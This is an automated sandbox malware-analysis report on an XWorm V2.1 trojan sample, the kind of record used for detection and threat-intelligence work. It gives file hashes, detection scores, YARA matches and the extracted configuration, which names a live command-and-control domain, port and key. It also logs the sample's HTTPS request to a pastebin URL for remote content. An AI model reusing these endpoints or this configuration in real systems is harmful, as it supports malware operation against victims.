Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GPgMeqI8Gy.exe

Overview

General Information

Sample name:GPgMeqI8Gy.exe
renamed because original name is a hash value
Original sample name:078bded0d7282b8b8daf4b40b837233a.exe
Analysis ID:1429288
MD5:078bded0d7282b8b8daf4b40b837233a
SHA1:526430046baebe7f7eb80960a1869718a142446e
SHA256:fd733056fe23c1d58de2178610834b5633dea41bd19f08063cff06a3732e9221
Tags:32exeXWorm
Infos:

Detection

XWorm
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
AV process strings found (often used to terminate AV products)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • GPgMeqI8Gy.exe (PID: 5712 cmdline: "C:\Users\user\Desktop\GPgMeqI8Gy.exe" MD5: 078BDED0D7282B8B8DAF4B40B837233A)
    • WerFault.exe (PID: 4088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 2040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["fuckurfeelins.anondns.net"], "Port": "3134", "Aes key": "3134", "Install file": "USB.exe", "Version": "XWorm V2.1"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    Process Memory Space: GPgMeqI8Gy.exe PID: 5712JoeSecurity_XWormYara detected XWormJoe Security
      SourceRuleDescriptionAuthorStrings
      0.2.GPgMeqI8Gy.exe.8ada48.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
        0.2.GPgMeqI8Gy.exe.8ada48.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: GPgMeqI8Gy.exeAvira: detected
          Source: 0.2.GPgMeqI8Gy.exe.8ada48.1.raw.unpackMalware Configuration Extractor: Xworm {"C2 url": ["fuckurfeelins.anondns.net"], "Port": "3134", "Aes key": "3134", "Install file": "USB.exe", "Version": "XWorm V2.1"}
          Source: fuckurfeelins.anondns.netVirustotal: Detection: 10%Perma Link
          Source: GPgMeqI8Gy.exeVirustotal: Detection: 33%Perma Link
          Source: GPgMeqI8Gy.exeReversingLabs: Detection: 23%
          Source: GPgMeqI8Gy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49705 version: TLS 1.2

          Networking

          barindex
          Source: Malware configuration extractorURLs: fuckurfeelins.anondns.net
          Source: unknownDNS query: name: paste.ee
          Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
          Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /r/tC4AK HTTP/1.1User-Agent: HimanenHost: paste.ee
          Source: unknownDNS traffic detected: queries for: paste.ee
          Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AK
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AK)
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AKZd
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AK_
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AKpns
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AKs
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/tC4AKy
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 2040
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename4horus.exe4 vs GPgMeqI8Gy.exe
          Source: GPgMeqI8Gy.exe, 00000000.00000002.2269904300.0000000000709000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBas.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD vs GPgMeqI8Gy.exe
          Source: GPgMeqI8Gy.exeBinary or memory string: OriginalFilenameBas.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD vs GPgMeqI8Gy.exe
          Source: GPgMeqI8Gy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 0.2.GPgMeqI8Gy.exe.8ada48.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.GPgMeqI8Gy.exe.8ada48.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
          Source: classification engineClassification label: mal92.troj.evad.winEXE@2/6@1/1
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeMutant created: NULL
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5712
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeFile created: C:\Users\user\AppData\Local\Temp\~DF1873810ED438744D.TMPJump to behavior
          Source: GPgMeqI8Gy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: GPgMeqI8Gy.exeVirustotal: Detection: 33%
          Source: GPgMeqI8Gy.exeReversingLabs: Detection: 23%
          Source: unknownProcess created: C:\Users\user\Desktop\GPgMeqI8Gy.exe "C:\Users\user\Desktop\GPgMeqI8Gy.exe"
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 2040
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: msvbvm60.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: vb6zz.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: asycfilt.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: GPgMeqI8Gy.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: GPgMeqI8Gy.exeStatic file information: File size 3162112 > 1048576
          Source: GPgMeqI8Gy.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26a000

          Data Obfuscation

          barindex
          Source: 0.2.GPgMeqI8Gy.exe.8ada48.1.raw.unpack, Helper.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: GPgMeqI8Gy.exeStatic PE information: real checksum: 0x3095ab should be: 0x30959d
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeCode function: 0_2_004058FA push ds; ret 0_2_00405902
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeCode function: 0_2_004038AC push ds; iretd 0_2_00403902
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeCode function: 0_2_00403DD1 push ds; iretd 0_2_00403DD2
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeCode function: 0_2_004079EA push ds; retf 0_2_00407A46
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeCode function: 0_2_00409A1E push ds; iretd 0_2_00409A2F
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeCode function: 0_2_00406F17 push dword ptr [ebp+7Ch]; ret 0_2_00406F1A
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeCode function: 0_2_00407B20 push ds; ret 0_2_00407B2A
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GPgMeqI8Gy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: Amcache.hve.4.drBinary or memory string: VMware
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
